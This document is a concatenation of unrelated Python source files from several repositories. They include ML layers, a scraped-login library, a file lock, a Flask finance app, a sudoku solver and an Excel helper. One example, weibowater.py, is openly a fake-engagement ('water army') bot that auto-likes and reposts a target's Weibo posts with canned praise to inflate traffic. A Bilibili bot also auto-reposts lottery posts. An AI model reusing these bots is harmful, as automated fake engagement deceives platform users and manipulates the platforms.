def __init__(self):
super(ROCAUCScore, self).__init__()
def forward(self, pred, target):
return roc_auc_score(pred, target)
class AUC(nn.Module):
def __init__(self):
super(AUC, self).__init__()
def forward(self, fpr, tpr):
return auc(fpr, tpr)
``` |
{
"source": "0h-n0/sequential_graph_generation",
"score": 3
} |
#### File: sequential_graph_generation/models/basic.py
```python
import math
import torch
import torch.nn as nn
import torch.distributions as dists
import torch.nn.functional as F
import torch.nn.utils.rnn as rnn_utils
def init_feedforward_weights(dnn: nn.Module,
init_mean=0,
init_std=1,
init_xavier: bool=True,
init_normal: bool=True,
init_gain: float=1.0):
for name, p in dnn.named_parameters():
if 'bias' in name:
p.data.zero_()
if 'weight' in name:
if init_xavier:
if init_normal:
nn.init.xavier_normal(p.data, init_gain)
else:
nn.init.xavier_uniform(p.data, init_gain)
else:
if init_normal:
nn.init.normal(p.data, init_gain)
else:
nn.init.uniform(p.data, init_gain)
class GraphLinear(torch.nn.Module):
"""Graph Linear layer.
This function assumes its input is 3-dimensional.
Differently from :class:`chainer.functions.linear`, it applies an affine
transformation to the third axis of input `x`.
.. seealso:: :class:`torch.nn.Linear`
"""
def __init__(self,
in_features,
out_features,
*,
nonlinearity='sigmoid',
init_mean=0,
init_std=1,
init_xavier: bool=True,
init_normal: bool=True,
init_gain = None,
dropout=0.0,
bias=True,
):
super(GraphLinear, self).__init__()
self.linear = torch.nn.Linear(in_features,
out_features,
bias)
self.out_features = out_features
self.nonlinearity = nonlinearity
if not init_gain and nonlinearity is not None:
init_gain = torch.nn.init.calculate_gain(nonlinearity)
else:
init_gain = 1
init_feedforward_weights(self.linear,
init_mean,
init_std,
init_xavier,
init_normal,
init_gain)
def __call__(self, x):
# (minibatch, atom, ch)
s0, s1, s2 = x.size()
x = x.view(s0 * s1, s2)
x = self.linear(x)
x = x.view(s0, s1, self.out_features)
return x
``` |
{
"source": "0honus0/DecryptLogin",
"score": 2
} |
#### File: DecryptLogin/DecryptLogin/login.py
```python
import warnings
from .modules import *
warnings.filterwarnings('ignore')
'''模拟登录类-直接返回登录后的session'''
class Login():
def __init__(self, disable_print_auth=False, **kwargs):
if not disable_print_auth: print(self)
self.supported_apis = {
'douban': douban().login, 'weibo': weibo().login, 'github': github().login, 'music163': music163().login,
'zt12306': zt12306().login, 'QQZone': QQZone().login, 'QQQun': QQQun().login, 'QQId': QQId().login,
'zhihu': zhihu().login, 'bilibili': bilibili().login, 'toutiao': toutiao().login, 'taobao': taobao().login,
'jingdong': jingdong().login, 'ifeng': ifeng().login, 'sohu': sohu().login, 'zgconline': zgconline().login,
'lagou': lagou().login, 'twitter': twitter().login, 'eSurfing': eSurfing().login, 'tencentvideo': tencentvideo().login,
'renren': renren().login, 'w3cschool': w3cschool().login, 'fishc': fishc().login, 'youdao': youdao().login,
'baidupan': baidupan().login, 'stackoverflow': stackoverflow().login, 'codalab': codalab().login, 'pypi': pypi().login,
'douyu': douyu().login, 'migu': migu().login, 'qunar': qunar().login, 'mieshop': mieshop().login, 'mpweixin': mpweixin().login,
'baidutieba': baidutieba().login, 'dazhongdianping': dazhongdianping().login, 'jianguoyun': jianguoyun().login,
'cloud189': cloud189().login, 'qqmusic': qqmusic().login, 'ximalaya': ximalaya().login, 'icourse163': icourse163().login,
'xiaomihealth': xiaomihealth().login,
}
for key, value in self.supported_apis.items():
setattr(self, key, value)
'''str'''
def __str__(self):
return 'Welcome to use DecryptLogin!\nYou can visit https://github.com/CharlesPikachu/DecryptLogin for more details.'
'''返回对应网站的客户端'''
class Client():
def __init__(self, disable_print_auth=False, **kwargs):
if not disable_print_auth: print(self)
self.supported_clients = {
'bilibili': BiliBiliClient, 'weibo': WeiboClient, 'douban': DoubanClient, 'github': GithubClient,
'music163': Music163Client, 'zt12306': Zt12306Client, 'QQZone': QQZoneClient, 'QQId': QQIdClient,
'QQQun': QQQunClient, 'zhihu': ZhihuClient, 'taobao': TaobaoClient, 'toutiao': ToutiaoClient,
'jingdong': JingdongClient, 'ifeng': IfengClient, 'sohu': SohuClient, 'zgconline': ZgconlineClient,
'twitter': TwitterClient, 'renren': RenRenClient, 'lagou': LagouClient, 'eSurfing': eSurfingClient,
'w3cschool': W3CSchoolClient, 'fishc': FishCClient, 'youdao': YoudaoClient, 'stackoverflow': StackoverflowClient,
'baidupan': BaiduPanClient, 'douyu': DouyuClient, 'codalab': CodaLabClient, 'pypi': PyPiClient,
'migu': MiguClient, 'qunar': QunarClient, 'xiaomihealth': XiaomiHealthClient, 'mieshop': MieShopClient,
'mpweixin': MpweixinClient, 'baidutieba': BaiduTiebaClient, 'dazhongdianping': DazhongdianpingClient, 'jianguoyun': JianguoyunClient,
'cloud189': Cloud189Client, 'qqmusic': QQMusicClient, 'ximalaya': XimalayaClient, 'icourse163': Icourse163Client,
'tencentvideo': TencentVideoClient,
}
for key, value in self.supported_clients.items():
setattr(self, key, value)
'''str'''
def __str__(self):
return 'Welcome to use DecryptLogin!\nYou can visit https://github.com/CharlesPikachu/DecryptLogin for more details.'
```
#### File: examples/bilibililottery/bilibililottery.py
```python
import re
import time
import random
import argparse
from tqdm import tqdm
from DecryptLogin import login
'''命令行参数解析'''
def parseArgs():
parser = argparse.ArgumentParser(description='B站监控关注的UP主并自动转发抽奖')
parser.add_argument('--username', dest='username', help='用于存储历史cookies的唯一标识ID', type=str, required=False)
parser.add_argument('--interval', dest='interval', help='查询UP主的动态的间隔时间', type=int, default=1800, required=False)
args = parser.parse_args()
return args
'''B站监控关注的UP主并自动转发抽奖'''
class BiliBiliLottery():
def __init__(self, username='charlespikachu', time_interval=1800, **kwargs):
self.username = username
self.time_interval = time_interval
self.comments = ['日常当分母', '就想简简单单中个奖QAQ', '啊啊啊啊啊, 让我中一次吧 T_T', '天选之子']
self.headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',
}
'''运行'''
def run(self):
# 模拟登录
client = login.Client()
bili = client.bilibili(reload_history=True)
infos_return, session = bili.login(self.username, '微信公众号: Charles的皮卡丘', 'scanqr')
# 获得关注列表
self.logging('正在获取您的关注列表')
followings_ids = self.getfollowings(session, infos_return)
# 获得UP主当前的动态
self.logging('正在获取您的关注列表里的UP主的所有动态')
followings_infos = {}
for userid in followings_ids:
followings_infos[userid] = self.getupdates(infos_return, userid, session)
# 监控新的动态
self.logging('开始监控是否有新的抽奖信息发布')
while True:
time.sleep(self.time_interval)
self.logging('开始检测是否有新的抽奖信息发布')
for userid in tqdm(followings_ids):
updates_old = followings_infos.pop(userid)
updates_latest = self.getupdates(infos_return, userid, session)
for dynamic_id in updates_latest.keys():
if dynamic_id not in updates_old:
desp = updates_latest[dynamic_id]
if '#互动抽取#' in desp:
result = self.forwardupdate(session, infos_return, dynamic_id)
self.logging(f'检测到有新的抽奖信息发布, 已经尝试转发, 返回的结果为{result}')
followings_infos[userid] = updates_latest
'''logging'''
def logging(self, msg, tip='INFO'):
print(f'[{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())} {tip}]: {msg}')
'''转发动态'''
def forwardupdate(self, session, infos_return, dynamic_id):
url = 'http://api.vc.bilibili.com/dynamic_repost/v1/dynamic_repost/repost'
data = {
'uid': infos_return['data']['mid'],
'dynamic_id': dynamic_id,
'content' : random.choice(self.comments),
'ctrl': '[{"data":"5581898","location":2,"length":4,"type":1},{"data":"10462362","location":7,"length":5,"type":1},{"data":"1577804","location":13,"length":4,"type":1}]',
'csrf_token': session.cookies.get('bili_jct')
}
response = session.post(url, data=data, headers=self.headers)
return response.json()
'''获得UP主的动态'''
def getupdates(self, infos_return, host_uid, session):
url = f'https://api.vc.bilibili.com/dynamic_svr/v1/dynamic_svr/space_history?visitor_uid={infos_return["data"]["mid"]}&host_uid={host_uid}&offset_dynamic_id=0&need_top=1&platform=web'
response = session.get(url, headers=self.headers)
response_json, updates = response.json(), {}
for card in response_json['data']['cards']:
dynamic_id = card['desc']['dynamic_id']
try:
desp = re.findall(r'"description":"(.*?)"', card['card'])[0]
except:
desp = ''
updates[dynamic_id] = desp
return updates
'''获得关注列表'''
def getfollowings(self, session, infos_return):
url = 'https://api.bilibili.com/x/relation/followings'
params = {
'vmid': infos_return['data']['mid'],
'pn': '1',
'ps': '20',
'order': 'desc',
'order_type': 'attention',
'jsonp': 'jsonp',
}
response = session.get(url, params=params, headers=self.headers)
total = response.json()['data']['total']
followings_ids, page = [], 1
while True:
for item in response.json()['data']['list']:
followings_ids.append(item['mid'])
if len(followings_ids) >= total: break
page += 1
params['pn'] = str(page)
response = session.get(url, params=params, headers=self.headers)
return followings_ids
'''run'''
if __name__ == '__main__':
args = parseArgs()
client = BiliBiliLottery(username=args.username, time_interval=args.interval)
client.run()
```
#### File: examples/weibowater/weibowater.py
```python
import re
import time
import random
import argparse
from DecryptLogin import login
'''命令行参数解析'''
def parseArgs():
parser = argparse.ArgumentParser(description='一个简单的微博水军机器人')
parser.add_argument('--username', dest='username', help='微博登录用的账户名', type=str, required=False)
parser.add_argument('--password', dest='password', help='微博登录用的密码', type=str, required=False)
parser.add_argument('--targetid', dest='targetid', help='想要流量造假服务的明星微博ID, 例如: 1776448504', type=str, required=True)
args = parser.parse_args()
return args
'''一个简单的微博水军机器人'''
class WeiboWater():
def __init__(self, username='charlespikachu', password='微信公众号: <PASSWORD>', targetid=None, **kwargs):
self.username = username
self.password = password
self.targetid = targetid
self.comments = ['转发微博', '太赞了', '真棒', '挺好的', '宣传一下']
self.headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',
}
'''运行'''
def run(self):
# 模拟登录
client = login.Client()
weibo = client.weibo(reload_history=True)
infos_return, session = weibo.login(self.username, self.password, 'mobile')
# 获取目标用户最新发表的一条微博
url = f'https://m.weibo.cn/u/{self.targetid}?uid={self.targetid}&luicode=10000011&lfid=231093_-_selffollowed'
session.get(url, headers=self.headers)
containerid = re.findall(r'fid%3D(\d+)%26', str(session.cookies))[0]
url = f'https://m.weibo.cn/api/container/getIndex?type=uid&value={self.targetid}&containerid={containerid}'
response = session.get(url, headers=self.headers)
for item in response.json()['data']['tabsInfo']['tabs']:
if item['tab_type'] == 'weibo': containerid = item['containerid']
url = f'https://m.weibo.cn/api/container/getIndex?type=uid&value={self.targetid}&containerid={containerid}'
response = session.get(url, headers=self.headers)
cards = response.json()['data']['cards']
for card in cards:
if card['card_type'] == 9:
self.logging(f'选择的用户微博为 >>>\n{card}')
break
selected_card = card
# 自动点赞
card_id = selected_card['mblog']['id']
response = session.get('https://m.weibo.cn/api/config')
st = response.json()['data']['st']
flag, response_json = self.starweibo(session, st, card_id)
if flag:
self.logging(f'自动点赞ID为{card_id}的微博成功')
else:
self.logging(f'自动点赞ID为{card_id}的微博失败, 返回的内容为 >>>\n{response_json}')
# 自动转发+评论
flag, response_json = self.repost(session, st, card_id)
if flag:
self.logging(f'自动转发+评论ID为{card_id}的微博成功')
else:
self.logging(f'自动转发+评论ID为{card_id}的微博失败, 返回的内容为 >>>\n{response_json}')
'''自动转发+评论'''
def repost(self, session, st, card_id):
url = 'https://m.weibo.cn/api/statuses/repost'
data = {
'id': card_id,
'content': random.choice(self.comments),
'dualPost': 1,
'mid': card_id,
'st': st,
}
response = session.post(url, data=data)
if 'ok' in response.json() and str(response.json()['ok']) == '1':
return True, response.json()
return False, response.json()
'''自动点赞'''
def starweibo(self, session, st, card_id):
session.headers.update({
'origin': 'https://m.weibo.cn',
'referer': f'https://m.weibo.cn/u/{self.targetid}?uid={self.targetid}',
})
data = {
'id': card_id,
'attitude': 'heart',
'st': st,
'_spr': 'screen:1536x864',
}
url = 'https://m.weibo.cn/api/attitudes/create'
response = session.post(url, data=data)
if 'ok' in response.json() and str(response.json()['ok']) == '1':
return True, response.json()
return False, response.json()
'''logging'''
def logging(self, msg, tip='INFO'):
print(f'[{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())} {tip}]: {msg}')
'''run'''
if __name__ == '__main__':
args = parseArgs()
client = WeiboWater(username=args.username, password=<PASSWORD>, targetid=args.targetid)
client.run()
``` |
{
"source": "0hsn/problem-per-day",
"score": 4
} |
#### File: 0hsn/problem-per-day/repeated_string.py
```python
from pprint import pprint
def repeatedString(s, n):
if len(s) == 1:
return n if s == 'a' else 0
if 'a' not in s:
return 0
rpt = int(n / len(s)) if (n % len(s) == 0) else int(n / len(s)) + 1
ss = s * rpt
ss = ss[:n]
cnt = 0
for c in ss:
if c == 'a': cnt+=1
return cnt
if __name__ == '__main__':
print(repeatedString('b', 10000000000000000000000))
``` |
{
"source": "0Hughman0/ezlock",
"score": 4
} |
#### File: ezlock/ezlock/lock.py
```python
from pathlib import Path
import os
import time
import atexit
class LockError(Exception):
pass
class Lock:
def __init__(self, path='.lock', release_on_exit=False):
"""
Lock object that keeps track of a file found at `self.path`. If there is a file found at `self.path`, the lock is considered... locked!
Parameters
==========
path : str, Path
path to write the lock file to (will be converted to `pathlib.Path`). Defaults to '.lock'.
"""
self.path = Path(path)
self._do_release_on_exit = None
self.release_on_exit = release_on_exit
@property
def name(self):
"""
name written to lock to prove ownership
"""
return 'pid:{}, obj:{}'.format(os.getpid(), id(self))
@property
def locked(self):
"""
Does the lock-file at `self.path` exist?
"""
return self.path.exists()
@property
def mine(self):
"""
Was the lock created by this object?
"""
try:
return self.path.read_text() == self.name
except FileNotFoundError:
raise LockError("Attempted to check ownership on lock that doesn't exist")
def acquire(self, force=False):
"""
Create the lock-file, and stamp on it that it was made by me!
Parameters
==========
force : bool
If the lock already exists, force switching ownership to me so `self.mine==True`. Defaults to False
"""
if self.locked and not force:
raise LockError("Attempted to acquire on already locked lock!")
self.path.write_text(self.name)
def release(self, force=False, rerelease=True):
"""
Release the lock.
Will get upset if the lock isn't `self.mine` but can override by setting `force=True`.
Parameters
==========
force : bool
force releasing the lock, even if not `self.mine`. (default `False`)
rerelease :
when `True` will not complain if attempting to release and already released lock. (default `True`)
Returns
=======
name : str
the name of the lock that was just released (None if no lock was released)
"""
if not self.locked:
if not rerelease:
raise LockError("Attempted to release an already released lock")
return None
if not self.mine and not force:
raise LockError("Attempted to release a lock that wasn't mine, can set `force=True`")
name = self.path.read_text()
os.remove(self.path.as_posix())
return name
@property
def release_on_exit(self):
return self._do_release_on_exit
@release_on_exit.setter
def release_on_exit(self, do):
if do:
atexit.register(self.release)
else:
atexit.unregister(self.release)
self._do_release_on_exit = do
def wait(self, dt=0.01):
"""
Wait until lock is released.
Parameters
==========
dt : float
how long to wait between checking for `self.locked`
"""
while self.locked:
time.sleep(dt)
def __enter__(self):
self.acquire()
def __exit__(self, exception_type, exception_value, traceback):
self.release()
def __bool__(self):
return self.locked
``` |
{
"source": "0Hughman0/housenet",
"score": 2
} |
#### File: housenet/housenet/views.py
```python
from decimal import Decimal
from io import BytesIO
from flask import request, render_template, send_file, json
from housenet import base_app
from housenet.database import db
from housenet.database.database import Housemate, Cashflow, Transaction
@base_app.route('/')
def home():
housemates = Housemate.query.all()
data = []
for housemate in housemates:
data.append(tuple((housemate.name, housemate.current_chore.title)))
return render_template("home.html", title="Home", data=data)
@base_app.route("/profile/<name>", methods=["POST", "GET"])
def profile(name):
housemate = Housemate.query.get(name)
if not housemate:
return "<a>You're drunk, go </a><a href='/'>home</a>"
if request.method == "POST":
change_dict = request.form.copy()
reason = change_dict.pop("reason")
for payment_type, payments in change_dict.items():
payments_list = (payment for payment in json.loads(payments) if payment['value'])
for payment in payments_list:
debt = Cashflow.query.filter(Cashflow.from_name == housemate.name,
Cashflow.to_name == payment["name"]).first()
if not debt:
continue
amount = Decimal(payment['value'])
# if payment_type == "your_owed": # Creates confusion about who put what in
# debt = debt.mirror
# amount = -amount
transaction = debt.add(amount)
transaction.reason = reason
db.session.add(transaction)
db.session.commit()
current_chore = housemate.current_chore
debts = (cashflow.as_tuple for cashflow in housemate.out_flow)
debits = (cashflow.as_tuple for cashflow in housemate.in_flow)
quits = (cashflow.as_tuple for cashflow in housemate.quits)
return render_template("profile.html", title=name, current_chore=current_chore, debts=debts, debits=debits,
quits=quits)
@base_app.route("/transactions_history")
def transactions():
return render_template("transactions.html", title="Transactions")
@base_app.route("/api/get_transactions")
def get_transactions():
all_transactions = Transaction.query.all()
return json.dumps({"data": tuple(transaction.to_row() for transaction in all_transactions)})
@base_app.route("/api/ical/<name>")
def get_ical(name):
housemate = Housemate.query.get(name)
return send_file(BytesIO(housemate.get_ical_feed()),
attachment_filename="{}_chores.ics".format(name),
as_attachment=True)
```
#### File: 0Hughman0/housenet/tests.py
```python
from app_factory import create_app
import unittest
"""
To be implemented... probably
"""
app, db = create_app("DEBUG")
app.testing = True
class HousenetBaseTestCase:
def setUp(self):
self.app = app.test_client()
def tearDown(self):
pass
def test_add_amount(self):
self.app.post("/profile/Person%201/", data={"t": 1})
class CliTestsCase(HousenetBaseTestCase, unittest.TestCase):
def test_save_db(self):
pass
class TestHousenetInit(unittest.TestCase):
def setUp(self):
pass
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "0Hughman0/sudokugh",
"score": 3
} |
#### File: 0Hughman0/sudokugh/sudokugh.py
```python
import numpy as np
import logging
import sys
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
RC_MASK = np.repeat(True, 9)
POSSIBLES = set(range(1, 10))
vals = np.vectorize(lambda cell: cell.val)
class Cell:
def __init__(self, grid, irow, icol):
self.possibles = POSSIBLES.copy()
self.grid = grid
self.irow = irow
self.icol = icol
self._row_mask = RC_MASK.copy()
self._col_mask = RC_MASK.copy()
self._box_mask = RC_MASK.copy().reshape(3, 3)
self._row_mask[self.icol] = False
self._col_mask[self.irow] = False
self._box_mask[self.irow - self.irbox, self.icol - self.icbox] = False
@property
def irbox(self):
return self.irow - self.irow % 3
@property
def icbox(self):
return self.icol - self.icol % 3
@property
def box(self):
return self.grid[self.irbox:self.irbox+3, self.icbox:self.icbox+3][self._box_mask]
@property
def row(self):
return self.grid[self.irow, :][self._row_mask]
@property
def col(self):
return self.grid[:, self.icol][self._col_mask]
@property
def fixed(self):
return len(self) <= 1
@property
def val(self):
if self.fixed:
return list(self.possibles)[0]
else:
return -1
def fix(self, val):
self.possibles = {val}
def __len__(self):
return self.possibles.__len__()
def __repr__(self):
return f"<Cell {self.irow, self.icol} {self.possibles}>"
def __hash__(self):
return (self.irow, self.icol, self.possibles).__hash__()
class Grid:
def __init__(self):
self.grid = np.array([[Cell(self, row, col) for col in range(9)] for row in range(9)])
def __getitem__(self, irowcol):
irow, icol = irowcol
return self.grid[irow, icol]
@classmethod
def from_string(cls, grid_string):
g = grid_string.strip()
cleaned = [l.split(',') for l in g.replace('|', '').replace(' ', '0').split('\n')]
arrayed = np.array(cleaned).astype(int)
return cls.from_array(arrayed)
@classmethod
def from_input(cls):
o = cls()
for i in range(9):
print("New row\n", i+1)
for j in range(9):
if j % 3:
print("New Box\n")
v = input(f"Enter value for cell {i + 1, j + 1}, blank for no value")
if v:
o[i, j].fix(int(v))
return o
@classmethod
def from_array(cls, array):
"""
0 or -1 for blank squares!
"""
o = cls()
for row, grow in zip(array, o.grid):
for num, cell in zip(row, grow):
if num in POSSIBLES:
cell.fix(num)
return o
def as_array(self):
return vals(self.grid)
def copy(self):
return self.from_array(self.as_array())
@property
def broken(self):
return any(len(cell.possibles) <= 0 for cell in self.grid.flatten())
def ifixed(self, collection=None):
if collection is None:
collection = self.grid
for cell in collection.flatten():
if cell.fixed:
yield cell
def iunfixed(self, collection=None):
if collection is None:
collection = self.grid
for cell in collection.flatten():
if not cell.fixed:
yield cell
def find_required(self, collection):
required = POSSIBLES.copy()
for fixed in self.ifixed(collection):
required -= fixed.possibles
return required
def count_fixed(self, collection=None):
if collection is None:
collection = self.grid
return sum(1 for cell in self.ifixed(collection))
def nearest_complete(self):
all_unfixed = list(self.iunfixed())
all_unfixed.sort(key=lambda cell: (len(cell.possibles), # smallest number of candidates
(8 * 3) - sum(self.count_fixed(collection) for collection in (cell.row, cell.col, cell.box)))) # largest amount of additional info!
return all_unfixed
def gen_targets(self):
while not all(cell.fixed for cell in self.grid.flatten()):
nearest_complete = self.nearest_complete()
count = self.count_fixed()
for cell in nearest_complete:
yield cell
if self.count_fixed() != count: # New fixed cells, need to start again!
break
else:
raise RuntimeError("Hit roadblock, all cells presented") # got to the end and made no progress
def display(self):
array = self.as_array()
return np.where(array != -1, array, ' ').astype(str)
def find_possibles(self, cell):
eliminated = set()
for collection in (cell.row, cell.col, cell.box):
for other in self.ifixed(collection):
eliminated.update(other.possibles)
return POSSIBLES ^ eliminated
def update_possibles(self):
for unfixed in self.iunfixed():
unfixed.possibles = self.find_possibles(unfixed)
if self.broken:
raise RuntimeError("Impossible to solve cell found")
def try_elimination(self, unfixed):
for collection in (unfixed.row, unfixed.col, unfixed.box):
possibles = self.find_required(collection) & unfixed.possibles
alternatives = self.iunfixed(collection)
for alternative in alternatives:
possibles -= alternative.possibles
if len(possibles) == 1:
unfixed.possibles = possibles
return True
return False
def solve(self):
logging.info("Performing initial reduction")
i = 0
self.update_possibles()
logging.info("Eliminating possibilities")
for i, target in enumerate(self.gen_targets()):
logging.info(f"Trying to deduce {target}")
if self.try_elimination(target):
logging.info(f"Success! {target.val}")
logging.info("Updating consequences")
self.update_possibles()
else:
logging.info("No luck!")
logging.info("Solved")
return i + 1
def deepsolve(self, pmin=1/9 ** 3, _p=1.0):
try:
i = self.solve()
logging.info("Deep solved")
return i
except RuntimeError:
logging.info("Got stuck, attempting to branch")
nearest_complete = self.nearest_complete()
for iba, candidate in enumerate(nearest_complete):
_p = (1 / len(candidate.possibles) * _p)
if _p < pmin:
raise RuntimeError("Chance of success judged too low")
for possible in candidate.possibles:
branch_grid = self.copy()
branch_grid[candidate.irow, candidate.icol].fix(possible)
try:
logging.info(f"Entering a branch for {candidate} using {possible}")
complete = branch_grid.deepsolve(pmin=pmin, _p=_p)
self.from_array(complete.as_array())
return complete
except Exception as e:
logging.info(f"Deadend reached due to {e}")
del branch_grid
if __name__ == '__main__':
from tests import T1, T2, T3, T4
g1 = Grid.from_array(T1)
g2 = Grid.from_array(T2)
g3 = Grid.from_array(T3)
g4 = Grid.from_array(T4)
``` |
{
"source": "0Hughman0/xl_link",
"score": 3
} |
#### File: xl_link/xl_link/mappers.py
```python
import pandas as pd
try:
from pandas.io.formats.excel import ExcelFormatter
except ImportError:
from pandas.formats.format import ExcelFormatter
from pandas.io.common import _stringify_path
from .xl_types import XLCell
from .chart_wrapper import create_chart, SINGLE_CATEGORY_CHARTS, CATEGORIES_REQUIRED_CHARTS
def get_xl_ranges(frame_index, frame_columns,
sheet_name='Sheet1',
columns=None,
header=True,
index=True,
index_label=None,
startrow=0,
startcol=0,
merge_cells=True):
"""
Deduces location of data_range, index_range and col_range within excel spreadsheet, given the parameters provided.
Does not require an actual DataFrame, which could be useful!
Parameters
----------
frame_index: Pandas Index or Array-like
to determine location of index within spreadsheet.
frame_columns: Pandas Index or Array-like
used to determine location of column within spreadsheet.
excel_writer : string or ExcelWriter
sheet_name : str
default ‘Sheet1’, Name of sheet which will contain DataFrame
columns : sequence
optional, Columns to write
header : bool or list of strings,
default True Write out the column names. If a list of strings is given it is assumed to be aliases for the column names
index : bool
default True. Write row names (index)
index_label : str or sequence
default None. Column label for index column(s) if desired. If None is given, and header and index are True, then the index names are used. A sequence should be given if the
DataFrame uses MultiIndex.
startrow : int
upper left cell row to dump data frame
startcol : int
upper left cell column to dump data frame
merge_cells : bool
default True. Write MultiIndex and Hierarchical Rows as merged cells.
Returns
-------
data_range, index_range, col_range : XLRange
Each range represents where the data, index and columns can be found on the spreadsheet
empty_f : DatFrame
an empty DataFrame with matching Indices.
"""
empty_f = pd.DataFrame(index=frame_index, columns=frame_columns)
formatter = ExcelFormatter(empty_f,
cols=columns,
header=header,
index=index,
index_label=index_label,
merge_cells=merge_cells)
excel_header = list(formatter._format_header())
col_start, col_stop = excel_header[0], excel_header[-1]
col_start_cell = XLCell(col_stop.row + startrow, col_start.col + startcol, sheet_name)
col_stop_cell = XLCell(col_stop.row + startrow, col_stop.col + startcol, sheet_name)
if isinstance(empty_f.index, pd.MultiIndex):
col_start_cell = col_start_cell.translate(0, 1)
col_range = col_start_cell - col_stop_cell
body = list(formatter._format_body())
if empty_f.index.name or index_label:
body.pop(0) # gets rid of index label cell that comes first!
index_start_cell = XLCell(body[0].row + startrow, body[0].col + startcol + empty_f.index.nlevels - 1, sheet_name)
index_stop_cell = XLCell(body[-1].row + startrow, body[0].col + startcol + empty_f.index.nlevels - 1, sheet_name)
index_range = index_start_cell - index_stop_cell
data_start_cell = XLCell(index_start_cell.row, col_start_cell.col, sheet_name)
data_stop_cell = XLCell(index_stop_cell.row, col_stop_cell.col, sheet_name)
data_range = data_start_cell - data_stop_cell
return data_range, index_range, col_range, empty_f
def write_frame(f, excel_writer, to_excel_args=None):
"""
Write a Pandas DataFrame to excel by calling to_excel, returning an XLMap, that can be used to determine
the position of parts of f, using pandas indexing.
Parameters
----------
f : DataFrame
Frame to write to excel
excel_writer : str or ExcelWriter
Path or existing Excel Writer to use to write frame
to_excel_args : dict
Additional arguments to pass to DataFrame.to_excel, see docs for DataFrame.to_excel
Returns
-------
XLMap :
Mapping that corresponds to the position in the spreadsheet that frame was written to.
"""
xlf = XLDataFrame(f)
return xlf.to_excel(excel_writer, **to_excel_args)
def _mapper_to_xl(value):
"""
Convert mapper frame result to XLRange or XLCell
"""
if isinstance(value, XLCell):
return value
if isinstance(value, pd.Series):
return value.values[0] - value.values[-1]
if isinstance(value, pd.DataFrame):
return value.values[0, 0] - value.values[-1, -1]
raise TypeError("Could not conver {} to XLRange or XLCell".format(value))
class _SelectorProxy:
"""
Proxy object that intercepts calls to Pandas DataFrame indexers, and re-interprets result into excel locations.
Parameters
----------
mapper_frame: DataFrame
with index the same as the DataFrame it is representing, however, each cell contains
the location they sit within the spreadsheet.
selector_name: str
name of the indexer SelectorProxy is emulating, i.e. loc, iloc, ix, iat or at
Notes
-----
Only implements __getitem__ behaviour of indexers.
"""
def __init__(self, mapper_frame, selector_name):
self.mapper_frame = mapper_frame
self.selector_name = selector_name
def __getitem__(self, key):
val = getattr(self.mapper_frame, self.selector_name)[key]
return _mapper_to_xl(val)
class XLMap:
"""
An object that maps a Pandas DataFrame to it's positions on an excel spreadsheet.
Provides access to basic pandas indexers - __getitem__, loc, iloc, ix, iat and at.
These indexers are modified such that they return the cell/ range of the result.
The idea is should make using the data in spreadsheet easy to access, by using Pandas indexing syntax.
For example can be used to create charts more easily (see example below).
Notes
-----
Recommended to not be created directly, instead via, XLDataFrame.to_excel.
XLMap can only go 'one level deep' in terms of indexing, because each indexer always returns either an XLCell,
or an XLRange. The only workaround is to reduce the size of your DataFrame BEFORE you call write_frame.
This limitation drastically simplifies the implementation. Examples of what WON'T WORK:
>>> xlmap.loc['Mon':'Tues', :].index
AttributeError: 'XLRange' object has no attribute 'index'
>>> xlmap.index['Mon':'Tues'] # Doesn't work because index is not a Pandas Index, but an XLRange.
TypeError: unsupported operand type(s) for -: 'str' and 'int'
Parameters
----------
data_range, index_range, column_range : XLRange
that represents the region the DataFrame's data sits in.
f : DataFrame
that has been written to excel.
Attributes
----------
index : XLRange
range that the index column occupies
columns : XLRange
range that the frame columns occupy
data : XLRange
range that the frame data occupies
writer : Pandas.ExcelWriter
writer used to create spreadsheet
sheet : object
sheet object corresponding to sheet the frame was written to, handy if you want insert a chart into the same sheet
Examples
--------
>>> calories_per_meal = XLDataFrame(columns=("Meal", "Mon", "Tues", "Weds", "Thur"),
data={'Meal': ('Breakfast', 'Lunch', 'Dinner', 'Midnight Snack'),
'Mon': (15, 20, 12, 3),
'Tues': (5, 16, 3, 0),
'Weds': (3, 22, 2, 8),
'Thur': (6, 7, 1, 9)})
>>> calories_per_meal.set_index("Meal", drop=True, inplace=True)
Write to excel
>>> writer = pd.ExcelWriter("Example.xlsx", engine='xlsxwriter')
>>> xlmap = calories_per_meal.to_excel(writer, sheet_name="XLLinked") # returns the XLMap
Create chart with XLLink
>>> workbook = writer.book
>>> xl_linked_sheet = writer.sheets["XLLinked"]
>>> xl_linked_chart = workbook.add_chart({'type': 'column'})
>>> for time in calories_per_meal.index:
>>> xl_linked_chart.add_series({'name': time,
'categories': proxy.columns.frange,
'values': proxy.loc[time].frange})
"""
def __init__(self, data_range, index_range, column_range, f, writer=None):
self.index = index_range
self.columns = column_range
self.data = data_range
self._f = f.copy()
self.writer = writer
self.book = writer.book
self.sheet = writer.sheets[self.index.sheet]
self._mapper_frame = f.copy().astype(XLCell)
x_range = self._f.index.size
y_range = self._f.columns.size
for x in range(x_range):
for y in range(y_range):
self._mapper_frame.values[x, y] = data_range[x, y]
@property
def f(self):
"""
for convenience provides read-only access to the DataFrame originally written to excel.
"""
return self._f
@property
def df(self):
"""
for convenience provides read-only access to the DataFrame originally written to excel.
"""
return self._f
def __repr__(self):
return "<XLMap: index: {}, columns: {}, data: {}>".format(self.index, self.columns, self.data)
def create_chart(self, type_='scatter',
values=None, categories=None, names=None,
subtype=None,
title=None, x_axis_name=None, y_axis_name=None):
"""
Create excel chart object based off of data within the Frame.
Parameters
----------
type_ : str
Type of chart to create.
values : str or list or tuple
label or list of labels to corresponding to column to use as values for each series in chart.
Default all columns.
categories : str or list or tuple
label or list of labels to corresponding to column to use as categories for each series in chart.
Default, use index for 'scatter' or None for everything else.
names: str or list or tuple
str or list of strs to corresponding to names for each series in chart.
Default, column names corresponding to values.
subtype : str
subtype of type, only available for some chart types e.g. bar, see Excel writing package for details
title : str
chart title
x_axis_name : str
used as label on x_axis
y_axis_name : str
